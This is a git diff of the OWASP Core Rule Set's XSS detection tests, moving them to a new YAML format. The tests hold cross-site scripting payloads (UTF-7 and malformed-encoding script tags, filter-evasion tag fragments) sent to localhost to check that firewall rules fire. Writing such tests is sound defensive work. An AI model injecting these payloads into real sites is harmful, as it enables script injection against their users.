Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "payload= +ADw-script+AD4-alert(1)+ADw-/script+AD4-" - version: HTTP/1.0 - output: - log_contains: id "941260" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "payload= +ADw-script+AD4-alert(1)+ADw-/script+AD4-" + version: HTTP/1.0 + output: + log: + expect_ids: [941260] diff --git a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml index 26a2d79..dec0415 100644 --- a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml +++ b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml @@ -1,40 +1,38 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 941270.yaml +rule_id: 941270 tests: - - test_title: 941270-1 + - test_id: 1 desc: "IE XSS Filters" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=%3clink%20%2f%20asdf%20href%20%20%2f%3d%20" - version: HTTP/1.0 - output: - log_contains: id "941270" - - test_title: 941270-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=%3clink%20%2f%20asdf%20href%20%20%2f%3d%20" + version: HTTP/1.0 + output: + log: + expect_ids: [941270] + - test_id: 2 desc: "XSS test based on portswigger XSS cheatsheet" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: 'payload=' - output: - log_contains: id "941270" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: 'payload=' + output: + log: + expect_ids: [941270] diff --git a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml index e34641c..8d2fa94 100644 --- a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml +++ b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml @@ -1,43 +1,41 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 941280.yaml +rule_id: 941280 tests: - - test_title: 941280-1 + - test_id: 1 desc: "IE XSS Filters" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=%3cBASE%20dsfds%20HREF%20%2f%20%3d" - version: HTTP/1.0 - output: - log_contains: id "941280" - - test_title: 941280-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=%3cBASE%20dsfds%20HREF%20%2f%20%3d" + version: HTTP/1.0 + output: + log: + expect_ids: [941280] + - test_id: 2 desc: "XSS test based on portswigger XSS cheatsheet" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Length: 113 - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: 'payload=xssxss&var=whatever" - version: HTTP/1.0 - output: - log_contains: id "941290" - - test_title: 941290-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=&var=whatever" + version: HTTP/1.0 + output: + log: + expect_ids: [941290] + - test_id: 2 desc: "XSS test based on portswigger XSS cheatsheet" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "payload=" - version: HTTP/1.0 - output: - log_contains: id "941290" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "payload=" + version: HTTP/1.0 + output: + log: + expect_ids: [941290] diff --git a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml index 43909b1..14f42f2 100644 --- a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml +++ b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml @@ -1,40 +1,38 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 941300.yaml +rule_id: 941300 tests: - - test_title: 941300-1 + - test_id: 1 desc: "IE XSS Filters" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?%3cOBJECT%20data%20%3d=sdffdsa" - version: HTTP/1.0 - output: - log_contains: id "941300" - - test_title: 941300-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?%3cOBJECT%20data%20%3d=sdffdsa" + version: HTTP/1.0 + output: + log: + expect_ids: [941300] + - test_id: 2 desc: "IE XSS Filters" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: "payload=" - output: - log_contains: id "941300" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: "payload=" + output: + log: + expect_ids: [941300] diff --git a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941310.yaml b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941310.yaml index 453fac1..14f8c89 100644 --- a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941310.yaml +++ b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941310.yaml @@ -2,226 +2,225 @@ meta: author: "Christian S.J. Peron, Federico G. Schwindt, azurit" description: US-ASCII Malformed Encoding XSS Filter - enabled: true - name: 941310.yaml +rule_id: 941310 tests: - - test_title: 941310-1 + - test_id: 1 desc: Positive test using single byte stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: var=\xbcscript\xbealert(\xa2XSS\xa2)\xbc/script\xbe - version: "HTTP/1.1" - output: - log_contains: id "941310" - - test_title: 941310-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: var=\xbcscript\xbealert(\xa2XSS\xa2)\xbc/script\xbe + version: "HTTP/1.1" + output: + log: + expect_ids: [941310] + - test_id: 2 desc: Positive test using utf-8 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: var=\xc2\xbcscript\xc2\xbealert(\xc2\xa2XSS\xc2\xa2)\xc2\xbc/script\xc2\xbe - version: "HTTP/1.1" - output: - log_contains: id "941310" - - test_title: 941310-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: var=\xc2\xbcscript\xc2\xbealert(\xc2\xa2XSS\xc2\xa2)\xc2\xbc/script\xc2\xbe + version: "HTTP/1.1" + output: + log: + expect_ids: [941310] + - test_id: 3 desc: Positive test using alternate utf-8 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: var=\xd0\xbcscript\xd0\xbealert(\xc2\xa2XSS\xc2\xa2)\xd0\xbc/script\xd0\xbe - version: "HTTP/1.1" - output: - log_contains: id "941310" - - test_title: 941310-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: var=\xd0\xbcscript\xd0\xbealert(\xc2\xa2XSS\xc2\xa2)\xd0\xbc/script\xd0\xbe + version: "HTTP/1.1" + output: + log: + expect_ids: [941310] + - test_id: 4 desc: Real world false positive for old rule with Russian utf-8 characters stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # Reported in https://github.com/coreruleset/coreruleset/issues/1942 as "абвгдеёжзийклмнопрстуфхцчшщъыэюя" - data: var=\xd0\xb0\xd0\xb1\xd0\xb2\xd0\xb3\xd0\xb4\xd0\xb5\xd1\x91\xd0\xb6\xd0\xb7\xd0\xb8\xd0\xb9\xd0\xba\xd0\xbb\xd0\xbc\xd0\xbd\xd0\xbe\xd0\xbf\xd1\x80\xd1\x81\xd1\x82\xd1\x83\xd1\x84\xd1\x85\xd1\x86\xd1\x87\xd1\x88\xd1\x89\xd1\x8a\xd1\x8b\xd1\x8d\xd1\x8e\xd1\x8f - version: "HTTP/1.1" - output: - no_log_contains: id "941310" - - test_title: 941310-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # Reported in https://github.com/coreruleset/coreruleset/issues/1942 as "абвгдеёжзийклмнопрстуфхцчшщъыэюя" + data: var=\xd0\xb0\xd0\xb1\xd0\xb2\xd0\xb3\xd0\xb4\xd0\xb5\xd1\x91\xd0\xb6\xd0\xb7\xd0\xb8\xd0\xb9\xd0\xba\xd0\xbb\xd0\xbc\xd0\xbd\xd0\xbe\xd0\xbf\xd1\x80\xd1\x81\xd1\x82\xd1\x83\xd1\x84\xd1\x85\xd1\x86\xd1\x87\xd1\x88\xd1\x89\xd1\x8a\xd1\x8b\xd1\x8d\xd1\x8e\xd1\x8f + version: "HTTP/1.1" + output: + log: + no_expect_ids: [941310] + - test_id: 5 desc: Real world false positive for old rule with German utf-8 characters stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # Reported in https://github.com/coreruleset/coreruleset/issues/1645 as "de_matten & sitzbez\xc3\xbcge > fu\xc3\x9fmatten_mt" - data: var=de_matten & sitzbez\xc3\x83\xc2\xbcge > fu\xc3\x83\xc2\x9fmatten_mt - version: "HTTP/1.1" - output: - no_log_contains: id "941310" - - test_title: 941310-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # Reported in https://github.com/coreruleset/coreruleset/issues/1645 as "de_matten & sitzbez\xc3\xbcge > fu\xc3\x9fmatten_mt" + data: var=de_matten & sitzbez\xc3\x83\xc2\xbcge > fu\xc3\x83\xc2\x9fmatten_mt + version: "HTTP/1.1" + output: + log: + no_expect_ids: [941310] + - test_id: 6 desc: Negative test for opening tag stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: var=\xbc\xbc - version: "HTTP/1.1" - output: - no_log_contains: id "941310" - - test_title: 941310-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: var=\xbc\xbc + version: "HTTP/1.1" + output: + log: + no_expect_ids: [941310] + - test_id: 7 desc: Negative test for closing tag stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: var=\xbe\xbe - version: "HTTP/1.1" - output: - no_log_contains: id "941310" - - test_title: 941310-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: var=\xbe\xbe + version: "HTTP/1.1" + output: + log: + no_expect_ids: [941310] + - test_id: 8 desc: Negative for missing end tag, opening tag stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: var=\xd0\xbcscript\xd0\xbealert(\xc2\xa2XSS\xc2\xa2)\xd0\xbc/script\xd0 - version: "HTTP/1.1" - output: - no_log_contains: id "941310" - - test_title: 941310-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: var=\xd0\xbcscript\xd0\xbealert(\xc2\xa2XSS\xc2\xa2)\xd0\xbc/script\xd0 + version: "HTTP/1.1" + output: + log: + no_expect_ids: [941310] + - test_id: 9 desc: Negative for missing end tag, closing tag stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: var=\xd0\xbcscript\xd0\xbealert(\xc2\xa2XSS\xc2\xa2)\xd0/script\xd0\xbe - version: "HTTP/1.1" - output: - no_log_contains: id "941310" - - test_title: 941310-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: var=\xd0\xbcscript\xd0\xbealert(\xc2\xa2XSS\xc2\xa2)\xd0/script\xd0\xbe + version: "HTTP/1.1" + output: + log: + no_expect_ids: [941310] + - test_id: 10 desc: Negative using real world Russian example in utf-8 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # Reported in https://github.com/coreruleset/coreruleset/issues/1942 as "абвгдеёжзийклмнпрстуфхцчшщъыэюя" - data: var=\xd0\xb0\xd0\xb1\xd0\xb2\xd0\xb3\xd0\xb4\xd0\xb5\xd1\x91\xd0\xb6\xd0\xb7\xd0\xb8\xd0\xb9\xd0\xba\xd0\xbb\xd0\xbc\xd0\xbd\xd0\xbf\xd1\x80\xd1\x81\xd1\x82\xd1\x83\xd1\x84\xd1\x85\xd1\x86\xd1\x87\xd1\x88\xd1\x89\xd1\x8a\xd1\x8b\xd1\x8d\xd1\x8e\xd1\x8f - version: "HTTP/1.1" - output: - no_log_contains: id "941310" - - test_title: 941310-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # Reported in https://github.com/coreruleset/coreruleset/issues/1942 as "абвгдеёжзийклмнпрстуфхцчшщъыэюя" + data: var=\xd0\xb0\xd0\xb1\xd0\xb2\xd0\xb3\xd0\xb4\xd0\xb5\xd1\x91\xd0\xb6\xd0\xb7\xd0\xb8\xd0\xb9\xd0\xba\xd0\xbb\xd0\xbc\xd0\xbd\xd0\xbf\xd1\x80\xd1\x81\xd1\x82\xd1\x83\xd1\x84\xd1\x85\xd1\x86\xd1\x87\xd1\x88\xd1\x89\xd1\x8a\xd1\x8b\xd1\x8d\xd1\x8e\xd1\x8f + version: "HTTP/1.1" + output: + log: + no_expect_ids: [941310] + - test_id: 11 desc: Negative using real world Russian example in utf-8, variant stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # Reported in https://github.com/coreruleset/coreruleset/issues/1942 as "абвгдеёжзийклнопрстуфхцчшщъыэюя" - data: var=\xd0\xb0\xd0\xb1\xd0\xb2\xd0\xb3\xd0\xb4\xd0\xb5\xd1\x91\xd0\xb6\xd0\xb7\xd0\xb8\xd0\xb9\xd0\xba\xd0\xbb\xd0\xbd\xd0\xbe\xd0\xbf\xd1\x80\xd1\x81\xd1\x82\xd1\x83\xd1\x84\xd1\x85\xd1\x86\xd1\x87\xd1\x88\xd1\x89\xd1\x8a\xd1\x8b\xd1\x8d\xd1\x8e\xd1\x8f - version: "HTTP/1.1" - output: - no_log_contains: id "941310" - - test_title: 941310-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # Reported in https://github.com/coreruleset/coreruleset/issues/1942 as "абвгдеёжзийклнопрстуфхцчшщъыэюя" + data: var=\xd0\xb0\xd0\xb1\xd0\xb2\xd0\xb3\xd0\xb4\xd0\xb5\xd1\x91\xd0\xb6\xd0\xb7\xd0\xb8\xd0\xb9\xd0\xba\xd0\xbb\xd0\xbd\xd0\xbe\xd0\xbf\xd1\x80\xd1\x81\xd1\x82\xd1\x83\xd1\x84\xd1\x85\xd1\x86\xd1\x87\xd1\x88\xd1\x89\xd1\x8a\xd1\x8b\xd1\x8d\xd1\x8e\xd1\x8f + version: "HTTP/1.1" + output: + log: + no_expect_ids: [941310] + - test_id: 12 desc: "Status Page Test - US-ASCII Malformed Encoding XSS Filter Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: test=\xbctest\xbetest(\xa2XSS\xa2)\xbc/test\xbe - version: "HTTP/1.1" - output: - log_contains: id "941310" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: test=\xbctest\xbetest(\xa2XSS\xa2)\xbc/test\xbe + version: "HTTP/1.1" + output: + log: + expect_ids: [941310] diff --git a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml index ee155e7..65c280f 100644 --- a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml +++ b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml @@ -1,24 +1,22 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 941320.yaml +rule_id: 941320 tests: - - test_title: 941320-1 + - test_id: 1 desc: "XSS Attack - HTML Tag Handler" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=\">" - output: - log_contains: id "941330" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: "payload=" + output: + log: + expect_ids: [941330] diff --git a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml index 214a6fe..b75576c 100644 --- a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml +++ b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml @@ -1,41 +1,39 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 941340.yaml +rule_id: 941340 tests: - - test_title: 941340-1 + - test_id: 1 desc: "IE XSS Filters - Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=' infoo.bar=&var2=whatever" - version: HTTP/1.0 - output: - log_contains: id "941340" - - test_title: 941340-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=' infoo.bar=&var2=whatever" + version: HTTP/1.0 + output: + log: + expect_ids: [941340] + - test_id: 2 desc: "XSS test based on portswigger XSS cheatsheet" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "payload=XSS" - version: HTTP/1.0 - output: - log_contains: id "941340" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "payload=XSS" + version: HTTP/1.0 + output: + log: + expect_ids: [941340] diff --git a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml index 11cd167..97a14eb 100644 --- a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml +++ b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml @@ -1,23 +1,21 @@ --- meta: author: "fgsch, azurit" - enabled: true - name: 941350.yaml - description: Test rule 941350 +rule_id: 941350 tests: - - test_title: 941350-1 + - test_id: 1 desc: GH issue 1514 stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get/xx?id=%252bADw-script%252bAD4-" - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - version: "HTTP/1.1" - output: - log_contains: id "941350" + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get/xx?id=%252bADw-script%252bAD4-" + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + version: "HTTP/1.1" + output: + log: + expect_ids: [941350] diff --git a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml index 218cf00..b94241c 100644 --- a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml +++ b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml @@ -1,61 +1,59 @@ --- meta: author: "Christian Folini, azurit" - description: None - enabled: true - name: 941360.yaml +rule_id: 941360 tests: - - test_title: 941360-1 + - test_id: 1 desc: "JSFuck / Hieroglyphy payload obfuscation attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: 